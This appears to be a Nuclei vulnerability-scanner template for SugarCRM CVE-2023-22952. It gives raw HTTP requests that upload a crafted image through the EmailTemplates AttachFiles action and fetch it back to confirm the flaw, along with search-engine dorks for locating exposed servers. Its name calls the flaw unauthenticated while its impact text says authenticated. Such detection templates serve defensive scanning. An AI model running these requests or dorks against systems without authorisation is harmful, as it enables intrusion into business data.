id: CVE-2023-22952

info:
  name: SugarCRM Unauthenticated - Remote Code Execution
  author: iamnoooob,rootxharsh,pdresearch
  severity: high
  description: |
    In SugarCRM before 12.0. Hotfix 91155, a crafted request can inject custom PHP code through the EmailTemplates because of missing input validation.
  impact: |
    Authenticated attackers can inject custom PHP code through EmailTemplates to execute arbitrary commands on the SugarCRM server, potentially compromising customer relationship data and business intelligence information.
  remediation: |
    Update SugarCRM to version 12.0 Hotfix 91155 or later that implements proper input validation for EmailTemplates.
  reference:
    - https://attackerkb.com/topics/E486ui94II/cve-2023-22952
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2023-22952
    cwe-id: CWE-20,CWE-94
    epss-score: 0.92822
    epss-percentile: 0.9977
    cpe: cpe:2.3:a:sugarcrm:sugarcrm:*:*:*:*:*:*:*:*
  metadata:
    vendor: sugarcrm
    product: sugarcrm
    shodan-query:
      - http.html:"sugarcrm inc. all rights reserved"
      - http.title:"sugar setup wizard"
      - http.title:"sugarcrm"
    fofa-query:
      - body="sugarcrm inc. all rights reserved"
      - title="sugar setup wizard"
      - title=sugarcrm
    google-query:
      - intext:"sugarcrm inc. all rights reserved"
      - intitle:"sugar setup wizard"
      - intitle:sugarcrm
  tags: cve,cve2023,sugarcrm,rce,file-upload,intrusive,kev,vkev,vuln

flow: http(1) && http(2) && http(3)

http:
  - raw:
      - |
        POST /index.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        module=Users&action=Authenticate&user_name=brenda&user_password=DbLiL98a

    matchers:
      - type: word
        part: body
        internal: true
        words:
          - 'You must specify a valid username and password'

  - raw:
      - |-
        POST /index.php HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_2_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryWeTJtA8WByYIQMGR
        Connection: close

        ------WebKitFormBoundaryWeTJtA8WByYIQMGR
        Content-Disposition: form-data; name="action"

        AttachFiles
        ------WebKitFormBoundaryWeTJtA8WByYIQMGR
        Content-Disposition: form-data; name="module"

        EmailTemplates
        ------WebKitFormBoundaryWeTJtA8WByYIQMGR
        Content-Disposition: form-data; name="file"; filename="{{randstr}}.txt"
        Content-Type: image/png

        {{ base64_decode('iVBORw0KGgoAAAANSUhEUgAAAAUAAAAUBAMAAAC3y+roAAAAD1BMVEVDVkUtMjAyMy0yMjk1MiA7qbPWAAAACXBIWXMAAA7EAAAOxAGVKw4bAAAAEUlEQVQImWNgAAJGZQcGKgEAHPkAZVUOitsAAAAASUVORK5CYII=')}}
        ------WebKitFormBoundaryWeTJtA8WByYIQMGR--

    matchers:
      - type: word
        part: body
        internal: true
        words:
          - '["cache\/images\/{{randstr}}.txt"]'

  - raw:
      - |
        GET /cache/images/{{randstr}}.txt HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "CVE-2023-22952"

      - type: word
        part: header
        words:
          - "text/plain"
# digest: 4a0a0047304502203d5639955dde96580c927fda3053a899928a61defa334828430bba374bf35dc60221008cd30b6c4c413cf4ba61a89e86791e26f2c598d04b4377e0767f326829569a76:922c64590222798bb761d5b6d8e72950